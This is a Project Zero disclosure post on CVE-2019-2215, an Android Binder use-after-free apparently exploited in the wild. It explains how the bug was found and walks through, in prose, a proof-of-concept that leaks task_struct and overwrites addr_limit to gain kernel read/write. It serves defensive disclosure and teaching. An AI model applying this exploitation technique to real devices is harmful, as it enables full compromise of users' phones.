Posted by Maddie Stone, Project Zero
Introduction
On October 3, 2019, we disclosed issue 1942 (CVE-2019-2215), which is a use-after-free in Binder in the Android kernel. The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If chained with a browser renderer exploit, this bug could fully compromise a device through a malicious website.
We reported this bug under a 7-day disclosure deadline rather than the normal 90-day disclosure deadline. We made this decision based on credible evidence that an exploit for this vulnerability exists in the wild and that it's highly likely that the exploit was being actively used against users.
In May 2019, Project Zero published a blog post and spreadsheet for tracking “in-the-wild” 0-day exploits. In July 2019, I joined Project Zero to focus on the use of 0-day exploits in the wild. We expect our approach to this work will change and mature as we gain more experience with studying 0-days, but the mission stays the same: to “make zero-day hard”. 
So far there are a few key approaches that we have started with: 
- Hunt for bugs based on rumors/leads that a 0-day is currently in use. We will use our bug hunting expertise to find and patch the bug, rendering the exploit benign.
- Perform variant analysis on 0-days used in the wild. When looking for bugs, you often find more than one of a similar type at the same time. However, an exploit usually uses one instance of a possible pattern or variant. If we can find and resolve all of the similar variant bugs, then the effort involved in creating a new exploit will be higher.
- Complete detailed analysis of the 0-days from the point of view of bug hunters and exploit developers and share it back with the community. Transparency and collaboration are key. We want to share detailed root cause analysis to inform developers and defenders on how to prevent these types of bugs in the future and improve detection. We hope that by publishing details about the exploit and its methodology, this can inform threat intelligence and incident responders. Overall, we want to make information that’s often kept in silos accessible to all.
This is just the starting point of how we’re thinking about tactical work around 0-day exploits used in the wild, but we won’t make much progress if we try to do this alone. Whether you’re a vendor, defender, researcher, journalist, threat analyst, policy specialist, victims’ advocate, or someone else, we all have a role we can play to make it hard to exploit 0-days in the wild. Please feel free to reach out to me to explore how we may be able to work together.
The rest of this post is to drive this conversation forward by sharing one instance of such work: CVE-2019-2215. This blog post will explain the bug and the methodology for finding it, how the proof-of-concept exploit we released works, and the evidence and commentary on the use of this bug for in-the-wild exploitation.
Hunting the Bug
In late summer 2019, Google’s Threat Analysis Group (TAG), Android Security, and Project Zero team received information suggesting that NSO had a 0-day exploit for Android that was part of an attack chain that installed Pegasus spyware on target devices. We received details about the marketed “capability”. These details included facts about the bug and exploit methodology, including:
- It is a kernel privilege escalation using a use-after-free vulnerability, reachable from inside the Chrome sandbox.
- It works on Pixel 1 and 2, but not Pixel 3 and 3a.
- It was patched in the Linux kernel >= 4.14 without a CVE.
- CONFIG_DEBUG_LIST breaks the primitive.
- CONFIG_ARM64_UAO hinders exploitation.
- The vulnerability is exploitable in Chrome's renderer processes under Android's isolated_app SELinux domain.
- The exploit requires little or no per-device customization.
- A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of issue 1942.
Each of these facts gave us important information to scope down the potential bug that we were looking for.
- “It is a kernel privilege escalation using a use-after-free vulnerability, accessible from inside the Chrome sandbox.”
We know that it’s a use-after-free in the kernel.
- "It works on Pixel 1 and 2, but not Pixel 3 and 3a."
We can diff the Pixel 2 and Pixel 3 kernels looking for changes.
- "It was patched in the Linux kernel >= 4.14 without a CVE."
The Pixel 3 is based on the Linux kernel 4.9 and doesn’t include the vulnerability, but the fix is not in the 4.9 Linux kernel, only 4.14.
- "CONFIG_DEBUG_LIST breaks the primitive."
This was an extremely helpful tip. In the kernel, there are only two actions (three functions) whose behavior changes based on the CONFIG_DEBUG_LIST flag: adding (__list_add) and deleting (__list_del_entry and list_del) from a doubly linked list. Therefore, we could infer that the freed obj is a linked list and has an add or delete performed on it after the free occurs.
- "CONFIG_ARM64_UAO hinders exploitation."
Likely means that the exploit is using the memory corruption to overwrite the address limit that is stored near the start of the task_struct. (It would normally be stored at the bottom of the stack on Linux <=4.9, but Android backported the change that moved it into task_struct to protect against stack overflows to older kernels.)
- The exploit requires little or no per-device customization.
We can assume the bug and its exploitation methodology are in the common kernel rather than in code that is often customized, like the framework.
- "A list of affected and unaffected devices and their versions."
Whenever there was a candidate bug that seemed to fit all the requirements above, I then vetted it against the list of affected and unaffected devices.
Based on these details, I began combing through changelogs and patches looking for the potential bug. Finding CVE-2019-2215 actually occured on my second attempt. I had originally thought the potential bug was a different issue, but then ruled it out based on the information above.
A few weeks after my first attempt at tracking down this bug, others recommended that I should look at Binder. Looking back, the detail that states “The vulnerability is exploitable in Chrome's renderer processes under Android's isolated_app SELinux domain.” should have caused me to look at the Binder driver first, but it didn’t.
When I diffed the Pixel 2 and Pixel 3 drivers/android/binder.c files and their changelogs, there were only a few significant changes. Commit 550c01d0e051461437d6e9d72f573759e7bc5047 stood out in the log because:
- It discusses fixing a “use-after-free” in the commit message,
- It is a patch from upstream, and
- The upstream patch was only applied to 4.14.
I then began to evaluate this bug against the other requirements of the bug in the leads and found that it matched them perfectly. I also looked through every other change to Binder (~25) between the Pixel 2 and Pixel 3, and no other changes matched every detail.
We wrote a proof-of-concept of our own that demonstrates how this bug can be exploited. 
The Original Discovery of the Bug
This bug was originally found and reported in November 2017 and patched in February 2018. Syzbot, a syzkaller system that continuously fuzzes the Linux kernel, originally reported the use-after-free bug to Linux kernel mailing lists and the syzkaller-bugs mailing list in November 2017. From this report, the bug was patched in the Linux 4.14, Android 3.18, Android 4.4, and Android 4.9 kernels in February 2018. However, this fix was never included in an Android monthly security bulletin and thus the bug was never patched in many already released devices, such as Pixel and Pixel 2.
Android provided the following statement on the original discovery of the bug.
"Android was informed of the security implications of this bug by Project Zero on September 26, 2019. Android partners were notified of the bug and provided updates to address it within 24 hours. Android also assigned CVE-2019-2215 to explicitly indicate that it represents a security vulnerability as the original report from syzkaller and the corresponding Linux 4.14 patch did not highlight any security implications. 
Pixel 3 and 3a were already protected against these issues. Updates for affected Pixel devices were available to users as early as October 7th, 2019.”
Technical Details of the Bug
The bug is a use-after-free (UAF) in the Binder driver. The binder_thread struct, defined in drivers/android/binder.c, has the member wait of the wait_queue_head_t struct type. wait is still referenced by a pointer in epoll, even after the binder_thread struct containing it is freed.
The BINDER_THREAD_EXIT ioctl calls the binder_thread_release function which frees the binder_thread struct. However, if epoll is called on this thread, binder_poll tells epoll to use wait, the wait queue that is embedded in the binder_thread struct. Therefore, when the binder_thread struct is freed, epoll is pointing to the now freed wait queue. Normally, the wait queue used for polling on a file is guaranteed to be alive until the file’s release handler is called. Rare cases require the use of POLLFREE. In contrast, the Binder driver only worked if you constantly removed and re-added the epoll watch. This is the underlying bug and the use-after-free is a symptom of that.
When we look at the stack trace from KASAN in the original report, we can see the use-after-free is in remove_wait_queue in kernel/sched/wait.c. The source code for the remove_wait_queue is below. In the remove_wait_queue function, q is the pointer to the freed wait_queue_head_t in the binder_thread struct and wait is an entry in the wait queue whose head has been freed. The use-after-free that triggered the KASAN crash is the call to spin_lock_irqsave with argument &q->lock when q is pointing to freed memory.
However, the __remove_wait_queue call is more interesting for exploitation. As shown below, __remove_wait_queue simply calls list_del on the task_list in the wait queue, giving us an unlinking primitive.
The bug can be triggered with the following code, which was also in the original report from syzkaller.
I verified that the Pixel 2, running Android 10 with SPL September 2019, still included this bug. The KASAN output is included in the issue tracker.
Exploiting the Use-After-Free
After confirming the bug and reporting to Android, I began working with fellow team member, Jann Horn, to write a proof-of-concept (PoC) exploit. The PoC we published on the issue tracker in comment #7 used the UAF described above to gain arbitrary kernel read and write from an unprivileged application context. In this section, I will explain how the PoC exploit that we wrote works. This section describes how we decided to exploit this bug and not necessarily how the in-the-wild exploit works.
This exploit triggers the UAF twice in order to overwrite the address limit to obtain arbitrary kernel read and write privileges. The first use of the UAF leaks the address of the task_struct, which contains the process’s address limit (addr_limit). The second use of the UAF overwrites the value of addr_limit. The addr_limit value defines which address range may be accessed when dereferencing userspace pointers. Usercopy operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process.
To trigger the UAF, we use vectored (scatter/gather) I/O in a somewhat similar way to what DiShen presented in his talk from Code Blue 2017, “The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel” [video].
Triggering the UAF
To exploit the UAF bug, we reallocate the freed binder_thread memory as an I/O vector and then use the unlinking primitive to gain scoped kernel read to leak the task_struct address. We trigger the UAF again for scoped kernel write to then overwrite the addr_limit. This section describes how we use the UAF for the initial read and write.
About Vectored I/O
Vectored I/O is also known as scatter/gather I/O. Vectored reads move data from a data source (here a file) into a set of disparate buffers (scatter), moving onto the next after each buffer is filled. A vectored write moves data from a set of buffers into a data sink (here a file) (gather). readv and writev are syscalls for performing vectored I/O. Their definitions from fs/read_write.c are below. 
The vec arguments are arrays of iovec structs where each iovec struct describes a buffer. The iovec struct definition from include/uapi/linux/uio.h is below.
We use writev to leak the address of the task_struct the first time we trigger the UAF. In addition to readv and writev, the recvmsg syscall for receiving a message from a socket also uses vectored I/O. In the msghdr, the second argument to recvmsg, there is a member named msg_iov that points to an array of iovec structs. We use recvmsg the second time we trigger the UAF to overwrite the addr_limit. 
Using vectored I/O for UAF write and read
We use the vectored I/O to gain UAF read (leaking the task_struct address) and UAF write (overwriting the addr_limit in the task_struct). Vectored I/O operations (like readv, writev, and recvmsg) import the user-space I/O vector array into kernel space and verify that all of the vector elements are in userspace in the call to rw_copy_check_uvector. If rw_copy_check_uvector returns successfully, the iovec array is now in kernel space and there will not be another verification on the pointer values in the iov_base fields. This means that while the I/O is blocking, we can overwrite the buffer pointers in the iovec array using our UAF read/write and then read from or write to a place in kernel memory. 
The iovec struct is of size 16 bytes and the binder_thread struct is 408 bytes. Therefore, we will create an array of 25 iovec structs in order to make the iovec array a similar size to the freed struct. The kernel allocates memory based on the size of the allocations so if we can control a struct of almost the same size as the freed memory, then there is a good chance that our controlled struct will be allocated into the same place. The iovec array is 8 bytes smaller than the binder_thread in order to not overwrite the task_struct pointer value at the end of the binder_thread struct, but that is still close enough to be allocated into the same slab, and thus the same position in kernel memory as the freed binder_thread struct. 
When the iovec array is allocated into the same memory as our freed binder_thread struct, the struct members will line up as below.
Once the vectored I/O has copied our iovec structs into kernel memory, we then want the I/O operation to block so that ep_remove_wait_queue can run from a separate thread. When ep_remove_wait_queue runs, it will perform a list_del operation on the values at offsets 0xA8 and 0xB0 in our diagram since ep_remove_wait_queue still believes these memory values to be a part of the wait_queue_head_t struct. 
ep_remove_wait_queue calls remove_wait_queue that calls __remove_wait_queue that calls list_del. 
The UAF exploitation technique described in this blog post is not successful when CONFIG_DEBUG_LIST is enabled because list_del is implemented differently when it’s enabled. The implementation when CONFIG_DEBUG_LIST is NOT enabled is shown above.
The debug implementation, shown below, is found in lib/list_debug.c. In the debug version, list_del calls __list_del_entry which includes checks to ensure that prev->next == entry && next->prev == entry. If any of these checks fail, BUG_ON will be called and the process will die (and on Android devices, which usually set kernel.panic_on_oops=1, the entire device will reboot). This check is what prevents this exploitation method from working when CONFIG_DEBUG_LIST is enabled.
The entry being passed to list_del is an entry in the wait queue list. The freed wait_queue_head_t struct contains the list head of which this entry is the only member. Prior to the list_del operation, the list looks like in the diagram below.
  
 
  
 
  
After the list_del the operation looks like the diagram below. The list head prev and next pointers have been set to point to the list head. This means that iov_base has been overwritten with a kernel address and we can now perform scoped read and write operations from the kernel space beginning at the list head. 
 
Leaking the task_struct pointer
We follow the process outlined above to use the use-after-free to leak the task structure pointer. In the Linux kernel, and thus in the Android kernel, the task_struct includes most of the important information about a process. In this case, we want to get the pointer to the task_struct because it includes the process’s address limit. 
The code to leak the task_struct pointer is in the function leak_task_struct in the PoC. The function starts by adding the binder file descriptor (fd) to the epoll’s interest list. We then create an array of 25 iovec structs. Next, we set the values of each of the iovec entries. For the first 10 entries, we set both the iov_base and iov_len to 0 so that the kernel skips them when processing the vector. iovec[10].iov_base is set to a value that will look like an unlocked spinlock. iovec[10].iov_len is set to the same size as the pipe such that when the pipe will block after moving all the contents from iovec[10].iov_base into the pipe. Once it unblocks, it will begin on iovec[11].
We set iovec[10].iov_base to dummy_page_4g_aligned because we need the lower-half of the address value to be 0 for it to pass as a spinlock. In remove_wait_queue, we need spin_lock_irqsave to run successfully so that __remove_wait_queue is called.
For this to be successful, the call to remove_wait_queue from within the EPOLL_CTL_DEL execution must occur after the iovec array has been copied to kernel memory by rw_copy_check_uvector (called by writev) and iovec[10] has been processed (since its length will be clobbered by the UAF write), but before writev begins reading from the address at iovec[11].iov_base. 
Therefore, we need the writev call to block prior to trying to write the iovec[11] contents to the pipe. To do this, we fill the whole pipe with contents that we don’t care about. Because we completely fill the pipe, writev will block until something begins to read from the pipe. Therefore, we set iovec[10].iov_base to be the address of the buffer with these filler contents and we set its length to the same size as the pipe size. writev will put all of the dummy contents into the pipe and block, giving us time to change the address of iovec[11].iov_base with the unlinking primitive in remove_wait_queue. After remove_wait_queue finishes, we can read the dummy contents from the pipe, unblocking the write. The now-unblocked writev will begin reading from the address in iovec[11].iov_base, which has now been changed to the list head address, binder_thread + 0xa8, in the kernel.
 
Once the writev finishes, we read from the other end of the pipe. The value at offset 0xE8 is the task_struct pointer. (The wait queue list head is at 0xa8 in the binder_thread struct and the task_struct pointer is at 0x190.)
Overwriting the Address Limit
Now that we have saved off the task_struct pointer, we trigger the UAF again in order to overwrite the address limit (at task_struct + 0x08), this time using recvmsg instead of writev. The process through the list_del is the same: the iov_base ends up pointing to the list_head of the wait_queue. At this point, though, instead of reading from that address, we begin to write the values below. 
To understand how this overwrites the addr_limit, we need to remember how scatter I/O works: we will read from a unix domain socket to disparate buffers, filling up one before moving to the next. After the list_del, the scatter I/O is about to begin on the buffer at iovec[11].iov_base. The value at iovec[11].iov_base now points to the list head of the wait queue after the list_del operation. The first 5 values we are going to overwrite are our iovec structs. We originally set iovec[11].iov_len to 0x28 which means we write 0x28 bytes before moving to the buffer stored in iovec[12].iov_base. We want to overwrite iovec[12].iov_base to be the address of the addr_limit so that we can overwrite the address limit without having to overwrite everything between the list head and the address limit. This is why we set the length of the iovec[11] buffer to 0x28 bytes: 0x8 bytes each for iovec[10].iov_len, iovec[11].iov_base, iovec[11].iov_len, iovec[12].iov_base, and iovec[12].iovec_len. Then we move to write through the newly-overwritten address in iovec[12].iov_base. This writes 0xFFFFFFFFFFFFFFFE (one less than KERNEL_DS to bypass the segment_eq(get_fs(), KERNEL_DS) branch in iov_iter_init()) to the addr_limit, now making all memory (including kernel memory) accessible as part of the user-space memory range in our process and thus granting arbitrary kernel read and write. 
In-the-Wild Analysis
As stated in the introduction, we deemed that there was enough credible evidence that CVE-2019-2215 was being used in the wild to support a 7-day disclosure deadline. This credible evidence included the leads and details outlined above in the “Hunting the Bug” section, and how after a detailed review of kernel patches, all requirements perfectly aligned with one bug (and only one bug). The examined information included marketing materials for this exploit, and that the exploit was used to install a version of Pegasus. With this evidence, we decided that although we did not have an exploit sample, the risk to users was too great to wait 90 days for a patch and disclosure, and thus reported this to Android under a 7-day deadline.
The 7-day deadline exists because “each day an actively exploited vulnerability remains undisclosed to the public and unpatched, more devices or accounts will be compromised.” Therefore, we decided that this vulnerability required disclosure to the public as soon as possible.
Variant Analysis
I think the most important “variant” that we can take away from this bug is that bugs are often patches in the upstream Linux and/or Android kernels that are not flagged as security bugs (though have security impact), so they are not included in the Android Security Bulletin and thus do not get patched in released devices. Sorting through Linux patches is a huge undertaking, so instead, one approach to address this issue could be addressed by regularly syncing with the upstream stable kernels. 
In addition, we also looked for other variants where the poll handler uses wait queues that are not tied to the lifetime of the file and no issues of similar significance have been discovered so far.
Conclusion
CVE-2019-2215 permits attackers to fully compromise a device with only untrusted app access or a browser renderer exploit and despite the patch being available in the upstream Linux kernel, it was left unpatched in Android devices for almost 2 years. In that time, we believe that attackers have been able to use this vulnerability to exploit users in the wild. Given the information in various public documents about the services that NSO Group provides, it seems most likely that this vulnerability was chained with either a browser renderer exploit or other remote capability.
Kernel vulnerabilities in Android are especially dangerous because they are largely the same across different devices, whereas other components on the device, such as the framework, SOC, or pre-installed apps, are often customized from one device to another and across different manufactures. With this single kernel vulnerability, the majority of Android devices manufactured prior to September 2018 were vulnerable. The patch gapping between the LTS Linux kernel, the Android common kernel, and the kernels running on end-users’ devices leaves a ripe surface area for exploitation. To prevent issues like this, Android could force all devices to sync to both upstream Linux and the Android common kernel at a regular cadence.
We publicly disclosed CVE-2019-2215 on October 3, 2019, 7-days after reporting to Android due to credible evidence of in-the-wild exploitation. We made this determination based on documents marketing and detailing an Android exploit “capability”. Our view is that it's often reasonable to infer that a vulnerability is being exploited in-the-wild from other forms of contextual information (such as the marketing materials seen in this case, combined with a deep analysis of patches) and that a binary/sample isn’t always required. Therefore, each day we waited to disclose meant another day that at-risk users were exposed to harm. 
On October 6, 2019, Android added updates to the October Android Security Bulletin and addressed the issue. Devices showing a security patch level on or after Oct 6, 2019 should be patched against CVE-2019-2215.
This bug highlights that in order to “make zero-day hard”, we need to work to learn as much as we can from 0-days used in the wild AND share it back with the community so that we can all work together to make this kind of exploitation that much harder. Please reach out and let’s collaborate!
tl;dr
- Leads, even without samples, can help us find bugs and get security vulnerabilities patched.
- The patch gap between released devices and the kernel leaves a ripe area for exploitation. The kernel is a key layer in Android’s security model.
- Project Zero is ramping up its in-the-wild 0day analysis work, and we're very open to collaboration. Please reach out!